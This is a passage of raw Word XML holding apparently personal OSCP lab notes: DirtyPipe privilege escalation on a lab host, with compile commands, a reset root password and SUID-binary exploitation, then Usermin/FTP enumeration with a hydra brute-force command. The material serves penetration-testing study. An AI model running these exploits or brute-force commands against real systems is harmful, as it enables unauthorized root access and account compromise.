      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75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Linux oscp 5.9.0-050900-generic #202010112230 SMP Sun Oct 11 22:34:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux 5.9.0 is vulnerable to DirtyPipe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or looked at the CVE section of Linux Smart Enumeration (the CVE section is only available if you download lse.sh from the releases section instead of the main frontpage)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>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2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="373" name="image371.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image371.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124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38D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or linPEAS, but dirtypipe was like the 4th of the 5 CVEs. So, I liked the first two ways better!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to exploit it, I used the first one on github</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1243">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it has two exploits, but the first one looks good since it resets root password and tries to open root shell, while the second one depends on an SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I first tried compiling it on the target, but it didn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then I compiled it on Kali, and export to target, and ran it but then I was getting this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75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./exploit-1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This meant that there was a gcc version problem. I learned from OSCP-A that you can add the -static flag to fix it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit above has a .sh file that does the gcc, but it's just two lines, so I skipped that file and ran gcc manually with -static flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The original command was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gcc exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command with -static flag that worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75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gcc -static exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I exported exploit-1 executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran it and got this output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>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270000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="339" name="image336.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image336.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124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38E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means it couldn't open shell, but it did seem to change root password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So I ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">piped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And I got root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I then also tried exploit-2, which was cool and simple as well! Basically you have to download and compile it exactly like exploit-1, and then to use it, you just pass in the file of ANY SUID bit binary, and it will use that to open Root shell. It legit doesn't matter what SUID binary, it can be anything, as long as SUID bit set!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75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gcc -static exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75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find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pick ANY file with SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75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./exploit-2 /usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/sudo was one example but I tried a bunch more and they all worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="752"/>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/usr/bin/su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="752"/>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/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="752"/>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/snap/core20/1695/usr/bin/umount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6wwi9dwxrfut" w:id="534"/>
      <w:bookmarkEnd w:id="534"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usermin (webmin, MiniServ)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP-C .157 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 20000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F6">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Firstly, we saw a port 80 that was useless.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F7">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And then we went to port 20000 which was a webserver, and it told us to go to oscp:20000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="276" name="image267.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image267.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1245"/>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38F9">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But when we try accessing it we get an error. So, we have to add it to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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sudo subl /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FB">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Add this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="108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192.168.239.157 oscp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FD">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Then access the page:</w:t>
      </w:r>
      <w:hyperlink r:id="rId1246">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1247">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://oscp:20000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FE">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You are met with a login page. I tried bruteforcing normal creds but nothing worked. I noticed the login page said "usermin" and in the autorecon output, in the "_patterns.log" we saw "Identified HTTP Server: MiniServ/1.820" and it listed some CVE. I then searched up MiniServ/1.820 exploits and it gave me usermin 1.820 exploits but they were authenticated so that means I need creds to login first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038FF">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I then logged into FTP as anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003900">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And then I saw backup folder, and downloaded all the PDFs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003902">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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mget *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003903">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And then I looked at each PDF but they seemed like random templates. So, I tried inspecting metadata using exiftool and I found these:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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130800" cy="4064000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="253" name="image245.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image245.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1248"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="51308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3905">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The other PDFs had usernames as well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003906">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So, I was supposed to use these usernames and try them on FTP and the webpage on port 20000 and attempt to use the username as the password as well, so cassie:cassie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003907">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You could have also bruteforced FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108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876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="571" name="image551.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image551.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124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3909">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1087"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.236.157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390A">
      <w:pPr>
